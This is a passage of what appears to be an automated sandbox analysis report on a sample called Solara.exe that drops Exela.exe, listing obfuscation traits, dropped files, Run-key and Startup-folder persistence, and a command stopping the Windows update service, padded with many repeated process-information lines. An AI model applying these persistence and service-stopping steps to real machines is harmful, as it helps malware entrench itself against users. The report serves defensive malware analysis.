                Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_N source: Exela.exe
                Source: Binary string: D:\_w\1\b\libcrypto-1_1.pdb source: Exela.exe

                Data Obfuscation

                Source: C:\Users\user\AppData\Local\Temp\Solara.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Process "C:\Users\user\AppData\Local\Temp\Solara.exe" -Verb runAs
                Source: VCRUNTIME140.dll.76.dr | Static PE information: 0x8E79CD85 [Sat Sep 30 01:19:01 2045 UTC]
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | Code function: 77_2_00007FFB084A3230 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,77_2_00007FFB084A3230
                Source: Solara.exe.1.dr | Static PE information: section name: .00cfg
                Source: rdqanwpudvuj.exe.7.dr | Static PE information: section name: .00cfg
                Source: VCRUNTIME140.dll.76.dr | Static PE information: section name: _RDATA
                Source: libffi-7.dll.76.dr | Static PE information: section name: UPX2
                Source: _rust.pyd.76.dr | Static PE information: section name: UPX2
                Source: C:\Users\user\Desktop\Solara.exe | Code function: 1_2_00007FFAAC3400BD pushad ; iretd 1_2_00007FFAAC3400C1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_00007FFAAC22D2A5 pushad ; iretd 3_2_00007FFAAC22D2A6
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_00007FFAAC412316 push 8B485F93h; iretd 3_2_00007FFAAC41231B
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_00007FFAAC23D2A5 pushad ; iretd 8_2_00007FFAAC23D2A6
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_00007FFAAC35BC9D push E85B15D5h; ret 8_2_00007FFAAC35BCF9
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_00007FFAAC422316 push 8B485F92h; iretd 8_2_00007FFAAC42231B
                Source: C:\Windows\System32\conhost.exe | Code function: 64_2_0000000140001394 push qword ptr [0000000140009004h]; ret 64_2_0000000140001403
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | Code function: 77_2_00007FFB08036EB6 push r10; retf 77_2_00007FFB08036EB9
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | Code function: 77_2_00007FFB08036E9B push rsi; ret 77_2_00007FFB08036E9C
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | Code function: 77_2_00007FFB080391A3 push rdi; iretd 77_2_00007FFB080391A5
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | Code function: 77_2_00007FFB0803A4A9 push rdx; ret 77_2_00007FFB0803A500
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | Code function: 77_2_00007FFB080385A7 push r12; ret 77_2_00007FFB080385E3
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | Code function: 77_2_00007FFB08036CCC push r8; ret 77_2_00007FFB08036CD9
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | Code function: 77_2_00007FFB08036ED0 push r12; ret 77_2_00007FFB08036EEE
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | Code function: 77_2_00007FFB08036CF6 push r12; ret 77_2_00007FFB08036CF8
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | Code function: 77_2_00007FFB0803A2E5 push rsp; retf 77_2_00007FFB0803A2E6
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | Code function: 77_2_00007FFB080392E4 push r10; retf 77_2_00007FFB08039350
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | Code function: 77_2_00007FFB08036CEA push rdx; ret 77_2_00007FFB08036CF1
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | Code function: 77_2_00007FFB080377EA push rsi; ret 77_2_00007FFB08037821
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | Code function: 77_2_00007FFB08038EFE push r12; ret 77_2_00007FFB08038F25
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | Code function: 77_2_00007FFB08036DFB push rsp; ret 77_2_00007FFB08036E03
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | Code function: 77_2_00007FFB08039C02 push rsp; retf 77_2_00007FFB08039C03
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | Code function: 77_2_00007FFB08036F32 push r12; ret 77_2_00007FFB08036F4A
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | Code function: 77_2_00007FFB08036C21 push r10; ret 77_2_00007FFB08036C23
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | Code function: 77_2_00007FFB08036F54 push r8; ret 77_2_00007FFB08036F5C
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | Code function: 77_2_00007FFB08038F53 push r12; iretd 77_2_00007FFB08038F6A
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | Code function: 77_2_00007FFB08036E44 push rdi; iretd 77_2_00007FFB08036E46
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | Code function: 77_2_00007FFB0803855C push rbp; retf 77_2_00007FFB08038575
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | Code function: 77_2_00007FFB08038E66 push rbp; iretq 77_2_00007FFB08038E67
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | Code function: 77_2_00007FFB0803A164 push rsp; ret 77_2_00007FFB0803A165
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | Code function: 77_2_00007FFB08036F8D push r10; ret 77_2_00007FFB08036FA0
                Source: initial sample | Static PE information: section name: UPX0
                Source: initial sample | Static PE information: section name: UPX1

                Persistence and Installation Behavior

                Source: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exe | File created: C:\Windows\TEMP\ypynqohyxqjk.sys
                Source: C:\Users\user\Desktop\Solara.exe | File created: C:\Users\user\AppData\Local\Temp\Exela.exe
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI70882\_socket.pyd
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI70882\cryptography\hazmat\bindings\_rust.pyd
                Source: C:\Users\user\Desktop\Solara.exe | File created: C:\Users\user\AppData\Local\Temp\Solara.exe
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File created: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe
                Source: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exe | File created: C:\Windows\Temp\ypynqohyxqjk.sys
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI70882\_multiprocessing.pyd
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI70882\_lzma.pyd
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI70882\python310.dll
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI70882\aiohttp\_websocket\mask.cp310-win_amd64.pyd
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI70882\VCRUNTIME140.dll
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI70882\_uuid.pyd
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI70882\_sqlite3.pyd
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI70882\aiohttp\_http_parser.cp310-win_amd64.pyd
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI70882\pyexpat.pyd
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI70882\yarl\_quoting_c.cp310-win_amd64.pyd
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI70882\_decimal.pyd
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI70882\libffi-7.dll
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI70882\_asyncio.pyd
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI70882\python3.dll
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI70882\_queue.pyd
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI70882\_cffi_backend.cp310-win_amd64.pyd
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Exela.exe
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI70882\frozenlist\_frozenlist.cp310-win_amd64.pyd
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI70882\select.pyd
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI70882\_ssl.pyd
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI70882\unicodedata.pyd
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI70882\libssl-1_1.dll
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI70882\aiohttp\_websocket\reader_c.cp310-win_amd64.pyd
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI70882\_bz2.pyd
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI70882\_overlapped.pyd
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI70882\sqlite3.dll
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI70882\libcrypto-1_1.dll
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI70882\propcache\_helpers_c.cp310-win_amd64.pyd
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI70882\_hashlib.pyd
                Source: C:\Users\user\AppData\Local\Temp\Solara.exe | File created: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exe
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI70882\_ctypes.pyd
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI70882\aiohttp\_http_writer.cp310-win_amd64.pyd
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI70882\multidict\_multidict.cp310-win_amd64.pyd

                Boot Survival

                Source: C:\Users\user\Desktop\Solara.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Exela
                Source: C:\Users\user\Desktop\Solara.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Solara
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Exela.exe
                Source: C:\Users\user\AppData\Local\Temp\Solara.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc

                Hooking and other Techniques for Hiding and Protection

                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | Code function: 76_2_00007FF75AE95820 GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,76_2_00007FF75AE95820
                Source: C:\Windows\System32\svchost.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\Solara.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Solara.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
